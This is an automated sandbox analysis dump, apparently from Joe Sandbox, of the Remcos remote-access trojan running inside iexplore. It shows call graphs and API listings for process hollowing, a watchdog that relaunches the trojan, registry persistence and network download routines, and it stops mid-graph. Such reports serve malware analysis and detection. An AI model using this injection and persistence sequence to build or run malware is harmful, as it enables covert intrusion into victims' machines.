48551->48539 48551->48546 48551->48549 48554 2d837aa 14 API calls 48551->48554 48626 2d8384f RegCreateKeyW 48551->48626 48553 2d7f8e8 48552->48553 48555 2d837aa 14 API calls 48553->48555 48554->48551 48556 2d7f8fb 48555->48556 48632 2d8288b TerminateProcess WaitForSingleObject 48556->48632 48558 2d7f903 ExitProcess 48563 2d82739 ___scrt_get_show_window_mode 48559->48563 48560 2d827ab 48561 2d827b0 Sleep 48565 2d8278b 48561->48565 48564 2d83733 3 API calls 48563->48564 48563->48565 48564->48565 48565->48560 48565->48561 48566 2d83982 31 API calls 48565->48566 48633 2d7cd48 48565->48633 48566->48565 48572 2d82232 48571->48572 48573 2d8c540 GetFileSize 48571->48573 48572->48447 48615 2d7244e 48573->48615 48575 2d8c554 48576 2d8c566 ReadFile 48575->48576 48577 2d8c573 48576->48577 48578 2d8c575 CloseHandle 48576->48578 48577->48578 48578->48572 48580 2d828c5 48579->48580 48581 2d8292b 48580->48581 48584 2d828d5 48580->48584 48583 2d82945 48581->48583 48622 2d7ca10 28 API calls 48581->48622 48623 2d7ccf0 11 API calls 48583->48623 48588 2d8290d 48584->48588 48620 2d7ca10 28 API calls 48584->48620 48587 2d8231c 48587->48496 48621 2d7ccf0 11 API calls 48588->48621 48591 2d88157 8 API calls 48590->48591 48592 2d881c4 ___scrt_get_show_window_mode 48591->48592 48610 2d8847b 48591->48610 48593 2d8822a CreateProcessW 48592->48593 48592->48610 48594 2d88260 VirtualAlloc Wow64GetThreadContext 48593->48594 48595 2d884b5 GetLastError 48593->48595 48596 2d8828e ReadProcessMemory 48594->48596 48597 2d8847f VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 48594->48597 48595->48610 48596->48597 48598 2d882b4 NtCreateSection 48596->48598 48597->48610 48598->48597 48599 2d882dc 48598->48599 48600 2d882eb NtUnmapViewOfSection 48599->48600 48601 2d882fc NtMapViewOfSection 48599->48601 48600->48601 48602 2d88368 GetCurrentProcess NtMapViewOfSection 48601->48602 48603 2d88320 VirtualFree NtClose TerminateProcess 48601->48603 48602->48597 48607 2d88395 _Yarn 48602->48607 48603->48591 48604 2d88363 48603->48604 48604->48610 48605 2d88431 WriteProcessMemory 48605->48597 48608 2d88450 48605->48608 48606 2d88454 Wow64SetThreadContext 48606->48597 48609 2d8846d ResumeThread 48606->48609 48607->48605 48607->48606 48608->48606 48609->48597 48609->48610 48610->48520 48611->48473 48612->48472 48613->48519 48616 2d72456 48615->48616 48618 2d72460 48616->48618 48619 2d72a51 28 API calls 48616->48619 48618->48575 48619->48618 48620->48588 48621->48587 48622->48583 48623->48587 48627 2d838a1 48626->48627 48629 2d83864 48626->48629 48628 2d71f09 11 API calls 48627->48628 48630 2d838ab 48628->48630 48631 2d8387d RegSetValueExW RegCloseKey 48629->48631 48630->48551 48631->48627 48632->48558 48634 2d7cd6e 48633->48634 48635 2d7cdaa 48633->48635 48659 2d7b9b7 48634->48659 48636 2d7cdeb 48635->48636 48640 2d7b9b7 28 API calls 48635->48640 48638 2d7ce2c 48636->48638 48641 2d7b9b7 28 API calls 48636->48641 48638->48565 48639 2d7cd80 48642 2d73014 28 API calls 48639->48642 48643 2d7cdc1 48640->48643 48644 2d7ce02 48641->48644 48645 2d7cd8a 48642->48645 48646 2d73014 28 API calls 48643->48646 48647 2d73014 28 API calls 48644->48647 48648 2d8384f 14 API calls 48645->48648 48649 2d7cdcb 48646->48649 48650 2d7ce0c 48647->48650 48651 2d7cd9e 48648->48651 48652 2d8384f 14 API calls 48649->48652 48653 2d8384f 14 API calls 48650->48653 48654 2d71f09 11 API calls 48651->48654 48655 2d7cddf 48652->48655 48656 2d7ce20 48653->48656 48654->48635 48657 2d71f09 11 API calls 48655->48657 48658 2d71f09 11 API calls 48656->48658 48657->48636 48658->48638 48660 2d71f86 11 API calls 48659->48660 48661 2d7b9c3 48660->48661 48664 2d7314c 48661->48664 48663 2d7b9df 48663->48639 48666 2d73156 48664->48666 48665 2d73175 48665->48663 48666->48665 48667 2d727e6 28 API calls 48666->48667 48667->48665 48668 2d96cdc 48673 2d96d59 send 48668->48673 48674 2d8e04e 48675 2d8e063 _Yarn ___scrt_get_show_window_mode 48674->48675 48687 2d8e266 48675->48687 48693 2da2f55 21 API calls ___std_exception_copy 48675->48693 48678 2d8e277 48680 2d8e21a 48678->48680 48689 2da2f55 21 API calls ___std_exception_copy 48678->48689 48679 2d8e213 ___scrt_get_show_window_mode 48679->48680 48694 2da2f55 21 API calls ___std_exception_copy 48679->48694 48683 2d8e2b0 ___scrt_get_show_window_mode 48683->48680 48690 2da35db 48683->48690 48685 2d8e240 ___scrt_get_show_window_mode 48685->48680 48695 2da2f55 21 API calls ___std_exception_copy 48685->48695 48687->48680 48688 2d8dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 48687->48688 48688->48678 48689->48683 48696 2da34fa 48690->48696 48692 2da35e3 48692->48680 48693->48679 48694->48685 48695->48687 48697 2da3513 48696->48697 48701 2da3509 48696->48701 48697->48701 48702 2da2f55 21 API calls ___std_exception_copy 48697->48702 48699 2da3534 48699->48701 48703 2da38c8 CryptAcquireContextA 48699->48703 48701->48692 48702->48699 48704 2da38e9 CryptGenRandom 48703->48704 48705 2da38e4 48703->48705 48704->48705 48706 2da38fe CryptReleaseContext 48704->48706 48705->48701 48706->48705 48707 2db6802 48708 2db680d RtlFreeHeap 48707->48708 48712 2db6836 __dosmaperr 48707->48712 48709 2db6822 48708->48709 48708->48712 48713 2db062d 20 API calls __dosmaperr 48709->48713 48711 2db6828 GetLastError 48711->48712 48713->48711 48714 2d85d41 48729 2d8b411 48714->48729 48716 2d85d4a 48717 2d720f6 28 API calls 48716->48717 48718 2d85d59 48717->48718 48740 2d74aa1 60 API calls _Yarn 48718->48740 48720 2d85d65 48721 2d870c4 48720->48721 48722 2d71fd8 11 API calls 48720->48722 48723 2d71e8d 11 API calls 48721->48723 48722->48721 48724 2d870cd 48723->48724 48725 2d71fd8 11 API calls 48724->48725 48726 2d870d9 48725->48726 48727 2d71fd8 11 API calls 48726->48727 48728 2d870e5 48727->48728 48730 2d720df 11 API calls 48729->48730 48731 2d8b41f 48730->48731 48732 2dabda0 ___std_exception_copy 21 API calls 48731->48732 48733 2d8b42f InternetOpenW InternetOpenUrlW 48732->48733 48734 2d8b456 InternetReadFile 48733->48734 48737 2d8b479 48734->48737 48735 2d720b7 28 API calls 48735->48737 48736 2d8b4a6 InternetCloseHandle InternetCloseHandle 48738 2d8b4b8 48736->48738 48737->48734 48737->48735 48737->48736 48739 2d71fd8 11 API calls 48737->48739 48738->48716 48739->48737 48740->48720

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 2d8812a-2d88153 6 2d88157-2d881be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5->6 7 2d884bb 6->7 8 2d881c4-2d881cb 6->8 9 2d884bd-2d884c7 7->9 8->7 10 2d881d1-2d881d8 8->10 10->7 11 2d881de-2d881e0 10->11 11->7 12 2d881e6-2d88213 call 2da6f10 * 2 11->12 12->7 17 2d88219-2d88224 12->17 17->7 18 2d8822a-2d8825a CreateProcessW 17->18 19 2d88260-2d88288 VirtualAlloc Wow64GetThreadContext 18->19 20 2d884b5 GetLastError 18->20 21 2d8828e-2d882ae ReadProcessMemory 19->21 22 2d8847f-2d884b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 19->22 20->7 21->22 23 2d882b4-2d882d6 NtCreateSection 21->23 22->7 23->22 24 2d882dc-2d882e9 23->24 25 2d882eb-2d882f6 NtUnmapViewOfSection 24->25 26 2d882fc-2d8831e NtMapViewOfSection 24->26 25->26 27 2d88368-2d8838f GetCurrentProcess NtMapViewOfSection 26->27 28 2d88320-2d8835d VirtualFree NtClose TerminateProcess 26->28 27->22 30 2d88395-2d88399 27->30 28->6 29 2d88363 28->29 29->7 31 2d8839b-2d8839f 30->31 32 2d883a2-2d883c0 call 2da6990 30->32 31->32 35 2d88402-2d8840b 32->35 36 2d883c2-2d883d0 32->36 38 2d8842b-2d8842f 35->38 39 2d8840d-2d88413 35->39 37 2d883d2-2d883f5 call 2da6990 36->37 48 2d883f7-2d883fe 37->48 42 2d88431-2d8844e WriteProcessMemory 38->42 43 2d88454-2d8846b Wow64SetThreadContext 38->43 39->38 41 2d88415-2d88428 call 2d8853e 39->41 41->38 42->22 46 2d88450 42->46 43->22 47 2d8846d-2d88479 ResumeThread 43->47 46->43 47->22 50 2d8847b-2d8847d 47->50 48->35 50->9
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000,?,02DE5300), ref: 02D88171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D88174
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection,?,02DE5300), ref: 02D88185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D88188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection,?,02DE5300), ref: 02D88199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose,?,02DE5300), ref: 02D881AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D881B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,?,?,?,02DE5300), ref: 02D88252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,?,02DE5300), ref: 02D8826A
                                                  • Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,02DE5300), ref: 02D88280
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,02DE5300), ref: 02D882A6
                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02D882CE
                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02D882F6
                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02D88316
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,02DE5300), ref: 02D88328
                                                  • NtClose.NTDLL(?), ref: 02D88332
                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,02DE5300), ref: 02D8833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040,?,?,?,?,?,02DE5300), ref: 02D8837C
                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,02DE5300), ref: 02D88387
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02D88446
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D88463
                                                  • ResumeThread.KERNEL32(?), ref: 02D88470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,02DE5300), ref: 02D88487
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,02DE5300), ref: 02D88492
                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 02D88499
                                                  • NtClose.NTDLL(?), ref: 02D884A3
                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,02DE5300), ref: 02D884AD
                                                  • GetLastError.KERNEL32(?,?,?,?,?,02DE5300), ref: 02D884B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 3150337530-3035715614
                                                  • Opcode ID: 1da0a5d5ea0ea9a43ee48c1aa0937f20360b511dabf91afb5855326075e672f3
                                                  • Instruction ID: 186936506801c6962ea27b99f6cebfad933e0b3cc118b5bb903e9ab7ee47e863
                                                  • Opcode Fuzzy Hash: 1da0a5d5ea0ea9a43ee48c1aa0937f20360b511dabf91afb5855326075e672f3
                                                  • Instruction Fuzzy Hash: 1FA15AB1A84309AFEB10AF64DC89F6ABBE9FF48704F50482AF685D6280D774DC14DB51

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 02D82141
                                                    • Part of subcall function 02D838B2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02D838C0
                                                    • Part of subcall function 02D838B2: RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004,?,?,?,02D82160,02DD73B4,00000000), ref: 02D838DB
                                                    • Part of subcall function 02D838B2: RegCloseKey.KERNEL32(?,?,?,?,02D82160,02DD73B4,00000000), ref: 02D838E6
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 02D82181
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D82190
                                                  • CreateThread.KERNEL32(00000000,00000000,02D82829,00000000,00000000,00000000), ref: 02D821E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02D82455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-13974260
                                                  • Opcode ID: 9bb68a6a90696ab9cd121ebbfa8c8323c79df6f392c935aa66c184a080415549
                                                  • Instruction ID: dda3ff888eb0bae7242a66ea741ea2df3d96d31c137f0e16dc744e82c33724c1
                                                  • Opcode Fuzzy Hash: 9bb68a6a90696ab9cd121ebbfa8c8323c79df6f392c935aa66c184a080415549
                                                  • Instruction Fuzzy Hash: 2D7186326042415BD604F774D859DAEB7B6EFA1704F904A1DE887523D0FF289D09CEB2

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 02D83584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 02D835A4
                                                    • Part of subcall function 02D83584: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,02DE5300), ref: 02D835C2
                                                    • Part of subcall function 02D83584: RegCloseKey.KERNEL32(?), ref: 02D835CD
                                                  • Sleep.KERNEL32(00000BB8), ref: 02D7F896
                                                  • ExitProcess.KERNEL32 ref: 02D7F905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.2.0 Pro$override$pth_unenc
                                                  • API String ID: 2281282204-4172715985
                                                  • Opcode ID: 290142f23adc774ddf05eccc7fd2b73637a18f9f7671e513e554d23df8a6ff0d
                                                  • Instruction ID: c898b754ac12d8b6dbc5ba88432ab571e7fa817264ab99044ed476f518983645
                                                  • Opcode Fuzzy Hash: 290142f23adc774ddf05eccc7fd2b73637a18f9f7671e513e554d23df8a6ff0d
                                                  • Instruction Fuzzy Hash: 8521F472F002015BEA1877748C5996EBAABEBC1B10F90055CF44A873C4FF28DE058BB2
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,02DA3550,00000034,?,?,030E0378), ref: 02DA38DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,02DA35E3,00000000,?,00000000), ref: 02DA38F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,02DA35E3,00000000,?,00000000,02D8E2E2), ref: 02DA3902
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: d0168fc23bed4a1099e5243a760adb178ed0690563ee3bf9d567df824dc68c88
                                                  • Instruction ID: f1ec93ab4d8c5ec73ae9ecadcaf8714b342dd5a6db7dc9cc32e4626731fde184
                                                  • Opcode Fuzzy Hash: d0168fc23bed4a1099e5243a760adb178ed0690563ee3bf9d567df824dc68c88
                                                  • Instruction Fuzzy Hash: 69E09231648212BBEB700E25AC28FA63B66EB81770F300978F155E42D4D6528C10D654

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02D7EA1C), ref: 02D8CBF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02D7EA1C), ref: 02D8CC16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CC19
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02D7EA1C), ref: 02D8CC2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CC2E
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02D7EA1C), ref: 02D8CC3F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CC42
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02D7EA1C), ref: 02D8CC54
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CC57
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02D7EA1C), ref: 02D8CC63
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02D7EA1C), ref: 02D8CC77
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02D7EA1C), ref: 02D8CC8B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02D7EA1C), ref: 02D8CC9F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02D7EA1C), ref: 02D8CCB3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02D7EA1C), ref: 02D8CCC7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02D7EA1C), ref: 02D8CCDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02D7EA1C), ref: 02D8CCEF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02D7EA1C), ref: 02D8CD03
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02D7EA1C), ref: 02D8CD14
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD17
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,02D7EA1C), ref: 02D8CD28
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,02D7EA1C), ref: 02D8CD38
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,02D7EA1C), ref: 02D8CD48
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD4B
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,02D7EA1C), ref: 02D8CD5D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,02D7EA1C), ref: 02D8CD6D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,02D7EA1C), ref: 02D8CD81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,02D7EA1C), ref: 02D8CD95
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CD98
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,02D7EA1C), ref: 02D8CDAA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,02D7EA1C), ref: 02D8CDBA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,02D7EA1C), ref: 02D8CDCA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,02D7EA1C), ref: 02D8CDDA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D8CDDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 61420d8bc84a8766d2669303cd3a0b62414703e12bd1334e72a77ca6e96ac283
                                                  • Instruction ID: 4f372bf265ddfb8617610fab4fad3f14705a830179b3227a8f3c34031fbe2b9e
                                                  • Opcode Fuzzy Hash: 61420d8bc84a8766d2669303cd3a0b62414703e12bd1334e72a77ca6e96ac283
                                                  • Instruction Fuzzy Hash: 6C41CAA4EE0B18B9FE207BBA7C4DD1B7F6CD940A94B010D17B105DB310DAB89C14CEA4

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 51 2d7ea00-2d7ea82 call 2d8cbe1 GetModuleFileNameW call 2d7f3fe call 2d720f6 * 2 call 2d8beac call 2d7fb52 call 2d71e8d call 2dafd50 68 2d7ea84-2d7eac9 call 2d7fbee call 2d71e65 call 2d71fab call 2d80f72 call 2d7fb9f call 2d7f3eb 51->68 69 2d7eace-2d7eb96 call 2d71e65 call 2d71fab call 2d71e65 call 2d7531e call 2d76383 call 2d71fe2 call 2d71fd8 * 2 call 2d71e65 call 2d71fc0 call 2d75aa6 call 2d71e65 call 2d751e3 call 2d71e65 call 2d751e3 51->69 95 2d7ef2d-2d7ef3e call 2d71fd8 68->95 115 2d7ebe9-2d7ec04 call 2d71e65 call 2d7b9f8 69->115 116 2d7eb98-2d7ebe3 call 2d76c59 call 2d71fe2 call 2d71fd8 call 2d71fab call 2d83584 69->116 125 2d7ec06-2d7ec25 call 2d71fab call 2d83584 115->125 126 2d7ec3e-2d7ec45 call 2d7d0a4 115->126 116->115 146 2d7f38a-2d7f3a5 call 2d71fab call 2d839e4 call 2d824b0 116->146 125->126 144 2d7ec27-2d7ec38 call 2d71fab call 2d839e4 125->144 134 2d7ec47-2d7ec49 126->134 135 2d7ec4e-2d7ec55 126->135 138 2d7ef2c 134->138 139 2d7ec57 135->139 140 2d7ec59-2d7ec65 call 2d8b354 135->140 138->95 139->140 150 2d7ec67-2d7ec69 140->150 151 2d7ec6e-2d7ec72 140->151 161 2d7ec3d 144->161 172 2d7f3aa-2d7f3db call 2d8bcef call 2d71f04 call 2d83a5e call 2d71f09 * 2 146->172 150->151 154 2d7ec74-2d7ec7b call 2d77751 151->154 155 2d7ecb1-2d7ecc4 call 2d71e65 call 2d71fab 151->155 165 2d7ec87-2d7ec9a call 2d71e65 call 2d71fab 154->165 166 2d7ec7d-2d7ec82 call 2d77773 call 2d7729b 154->166 174 2d7ecc6 call 2d77790 155->174 175 2d7eccb-2d7ed53 call 2d71e65 call 2d8bcef call 2d71f13 call 2d71f09 call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab 155->175 161->126 165->155 187 2d7ec9c-2d7eca2 165->187 166->165 202 2d7f3e0-2d7f3ea call 2d7dd7d call 2d84f65 172->202 174->175 223 2d7ed55-2d7ed6e call 2d71e65 call 2d71fab call 2dabb56 175->223 224 2d7edbb-2d7edbf 175->224 187->155 190 2d7eca4-2d7ecaa 187->190 190->155 193 2d7ecac call 2d7729b 190->193 193->155 223->224 249 2d7ed70-2d7ed9c call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d7da6f 223->249 225 2d7edc5-2d7edcc 224->225 226 2d7ef41-2d7efa1 call 2da6f10 call 2d7247c call 2d71fab * 2 call 2d83733 call 2d79092 224->226 228 2d7edce-2d7ee48 call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d7ce34 225->228 229 2d7ee4a-2d7ee54 call 2d79092 225->229 280 2d7efa6-2d7effa call 2d71e65 call 2d71fab call 2d72093 call 2d71fab call 2d837aa call 2d71e65 call 2d71fab call 2dabb2c 226->280 239 2d7ee59-2d7ee7d call 2d7247c call 2da4829 228->239 229->239 257 2d7ee7f-2d7ee8a call 2da6f10 239->257 258 2d7ee8c 239->258 294 2d7eda1-2d7edb6 call 2d71f13 call 2d71f09 249->294 263 2d7ee8e-2d7ef03 call 2d71f04 call 2daf859 call 2d7247c call 2d71fab call 2d7247c call 2d71fab call 2d83982 call 2da4832 call 2d71e65 call 2d7b9f8 257->263 258->263 263->280 334 2d7ef09-2d7ef28 call 2d71e65 call 2d8bcef call 2d7f4af 263->334 332 2d7f017-2d7f019 280->332 333 2d7effc 280->333 294->224 336 2d7f01f 332->336 337 2d7f01b-2d7f01d 332->337 335 2d7effe-2d7f015 call 2d8ce2c CreateThread 333->335 334->280 352 2d7ef2a 334->352 340 2d7f025-2d7f101 call 2d72093 * 2 call 2d8b580 call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2dabb2c call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab StrToIntA call 2d79e1f call 2d71e65 call 2d71fab 335->340 336->340 337->335 390 2d7f103-2d7f13a call 2da455e call 2d71e65 call 2d71fab CreateThread 340->390 391 2d7f13c 340->391 352->138 392 2d7f13e-2d7f156 call 2d71e65 call 2d71fab 390->392 391->392 402 2d7f194-2d7f1a7 call 2d71e65 call 2d71fab 392->402 403 2d7f158-2d7f18f call 2da455e call 2d71e65 call 2d71fab CreateThread 392->403 413 2d7f207-2d7f21a call 2d71e65 call 2d71fab 402->413 414 2d7f1a9-2d7f202 call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d7da23 call 2d71f13 call 2d71f09 CreateThread 402->414 403->402 425 2d7f255-2d7f279 call 2d8b69e call 2d71f13 call 2d71f09 413->425 426 2d7f21c-2d7f250 call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2dabb2c call 2d7c19d 413->426 414->413 446 2d7f27e-2d7f291 CreateThread 425->446 447 2d7f27b-2d7f27c SetProcessDEPPolicy 425->447 426->425 450 2d7f293-2d7f29d CreateThread 446->450 451 2d7f29f-2d7f2a6 446->451 447->446 450->451 454 2d7f2b4-2d7f2bb 451->454 455 